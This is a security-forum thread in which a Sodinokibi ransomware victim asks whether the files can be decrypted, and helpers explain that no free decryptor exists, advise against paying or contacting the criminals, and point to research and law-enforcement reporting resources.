Jibz

Files encrypted with Sodinokibi probably

Recommended Posts

Hello,

I'm not sure how I got infected it but I think when I executed a .js file. I thought it was the file I wanted to download.

Is there a way to decrypt my files back?
I attached the javascript file script in case it will help. Be careful, do not execute it like I did.
Thank you 

17i56-readme.txt stupid_ransomware!!.js

6ca2e8b7.lock 17i56-readme.txt bleach_ichigo_sword_hollow_wave_weapons_94546_1920x1080.jpg.17i56

Share this post


Link to post
Share on other sites

At the moment there are no free decrypters for Sodinokibi Ransomware.

This Ransomware is still being studied. There are several different variants.

I described his early version in April, but have not yet completed the information. It differs little from the first sample, except new text on blue background. 

Share this post


Link to post
Share on other sites
3 hours ago, Amigo-A said:

At the moment there are no free decrypters for Sodinokibi Ransomware.

This Ransomware is still being studied. There are several different variants.

I described his early version in April, but have not yet completed the information. It differs little from the first sample, except new text on blue background. 

Hi,

Thanks for your reply.

Do you think it will take time to make a decryptor?

And was the JavaScript file the ransomware? If yes, shouldn't be easier to craft an antitode from that is source?

Share this post


Link to post
Share on other sites

The JS file in the attachment is malicious. I do not know its functionality, perhaps the loader.
Usually they are used to load or run the main file of the encoder.
Researchers have enough samples of different options. No one has reported the decryptor.

Share this post


Link to post
Share on other sites
16 minutes ago, Amigo-A said:

The JS file in the attachment is malicious. I do not know its functionality, perhaps the loader.
Usually they are used to load or run the main file of the encoder.
Researchers have enough samples of different options. No one has reported the decryptor.

Ah I see. Let's hope the researchers craft a decryptor soon enough.

I was thinking maybe the researchers would want the JS file, that's why I put it there.
Thanks

Share this post


Link to post
Share on other sites
3 hours ago, Jibz said:

I was thinking maybe the researchers would want the JS file, that's why I put it there.

I've forwarded the JS file to our analysts in case they want to take a look at it.

As for the lack of a decrypter, usually that simply means that a functioning decrypter simply isn't feasible. Either the encryption is too difficult to crack, or it would simply take too long to do it on victims' computers for them to get their files back in a reasonable amount of time.

Share this post


Link to post
Share on other sites
1 minute ago, GT500 said:

I've forwarded the JS file to our analysts in case they want to take a look at it.

As for the lack of a decrypter, usually that simply means that a functioning decrypter simply isn't feasible. Either the encryption is too difficult to crack, or it would simply take too long to do it on victims' computers for them to get their files back in a reasonable amount of time.

By the way, I went on their website and I could check if their online decryptor works. And yes it actually works, I could decrypt 3 of my files. Unfortunately I don't have 1500$ to buy their decryptor. Of course it is not advised to do so either.

Share this post


Link to post
Share on other sites
5 minutes ago, Jibz said:

Of course it is not advised to do so either.

Correct, it is generally recommended to avoid paying ransoms like this.

Even more so than that, never try to contact the criminals yourself. If you feel you have to contact them for any reason, then I recommend having a third-party that is experienced in negotiating with criminals like this contact them for you. CoveWare is the only one I can remember off the top of my head, however there are a few others as well that are honest enough to admit that this is what they do and I would believe also give you the odds of receiving a working decrypter from the criminals.

Share this post


Link to post
Share on other sites

By the pace at which the malicious campaign is developing, spreading this Sodinokibi, I see that they are not doing this for the first time.
Previously, researchers independently of each other noted kinship with another "sensational" Ransomware. I will not give his name so as not to contribute to his popularity. [They have robbed people of several billion dollars and recently reported the closure of this Ransomware-project]. But the fact of the alleged relationship may indicate that the actors, who stand behind him could have previously taken part in the dissemination of the extortioner, which I do not call. 

Share this post


Link to post
Share on other sites
11 hours ago, Amigo-A said:

By the pace at which the malicious campaign is developing, spreading this Sodinokibi, I see that they are not doing this for the first time.
Previously, researchers independently of each other noted kinship with another "sensational" Ransomware. I will not give his name so as not to contribute to his popularity. [They have robbed people of several billion dollars and recently reported the closure of this Ransomware-project]. But the fact of the alleged relationship may indicate that the actors, who stand behind him could have previously taken part in the dissemination of the extortioner, which I do not call. 

Are you talking about that ransomware where they made 2 billions or something and that they had to close it cause they "earned" enough?
Do you think there will be public decrypter for Sodinokibi?

Share this post


Link to post
Share on other sites
21 hours ago, GT500 said:

Correct, it is generally recommended to avoid paying ransoms like this.

Even more so than that, never try to contact the criminals yourself. If you feel you have to contact them for any reason, then I recommend having a third-party that is experienced in negotiating with criminals like this contact them for you. CoveWare is the only one I can remember off the top of my head, however there are a few others as well that are honest enough to admit that this is what they do and I would believe also give you the odds of receiving a working decrypter from the criminals.

Hey GT500. Is Sodinokibi under heavy research?
I shouldn't ask this but do you know perhaps how long it would take to find a decrypter for Sodinokibi?

Share this post


Link to post
Share on other sites
1 hour ago, Jibz said:

Are you talking about that ransomware where they made 2 billions or something and that they had to close it cause they "earned" enough?

Yes. 😃

Share this post


Link to post
Share on other sites
1 hour ago, Jibz said:

Do you think there will be public decrypter for Sodinokibi?

Not so fast, but quite possible in the future. 

Share this post


Link to post
Share on other sites
5 minutes ago, Jibz said:

Hey GT500. Is Sodinokibi under heavy research?

It's already been fairly heavily researched by the Cisco Talos Intelligence Group:
https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

By now, almost every ransomware researcher and analyst has certainly had time to take a good look at this ransomware as well.

 

7 minutes ago, Jibz said:

I shouldn't ask this but do you know perhaps how long it would take to find a decrypter for Sodinokibi?

If one will be released, then I expect it will take some time. As for how much time, I would only be able to speculate.

Share this post


Link to post
Share on other sites
1 minute ago, Amigo-A said:

Not so fast, but quite possible in the future. 

You give me hope. I already saved my encrypted files, formated my system drive and waiting for decrypter.
Thank you.

Share this post


Link to post
Share on other sites
1 minute ago, GT500 said:

It's already been fairly heavily researched by the Cisco Talos Intelligence Group:
https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

By now, almost every ransomware researcher and analyst has certainly had time to take a good look at this ransomware as well.

 

If one will be released, then I expect it will take some time. As for how much time, I would only be able to speculate.

What is your speculation?

Share this post


Link to post
Share on other sites
Just now, Jibz said:

What is your speculation?

Depending on how the decrypter would need to be made, it could take anywhere from a few weeks to a couple of years. There's really no way to know for certain until a decrypter is ready for release.

Share this post


Link to post
Share on other sites
2 minutes ago, GT500 said:

Depending on how the decrypter would need to be made, it could take anywhere from a few weeks to a couple of years. There's really no way to know for certain until a decrypter is ready for release.

Let's hope few weeks! Couple of years is just too much :D

Share this post


Link to post
Share on other sites
Just now, Amigo-A said:

Sodinokibi exists already one and a half month. 

Yeah I saw it.
By the way, those hackers have stone heart. Tried to negotiate a free decryptor, but nope nope won't happen they say.

Share this post


Link to post
Share on other sites
10 minutes ago, Jibz said:

By the way, those hackers have stone heart. Tried to negotiate a free decryptor, but nope nope won't happen they say.

We recommend never contacting the criminals yourself. Always have a third-party with experience negotiating with criminals contact them for you. There are a number of companies that are upfront about the fact that they do this, however the only one whose name I can remember off the top of my head is CoveWare.

It's also not a bad idea to inform law enforcement about a security breach and/or a ransomware incident. They can at least investigate the criminals, and see if they can locate them. Here's a link to a list of law enforcement agencies by country, with links to their contact information:
https://www.nomoreransom.org/en/report-a-crime.html

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.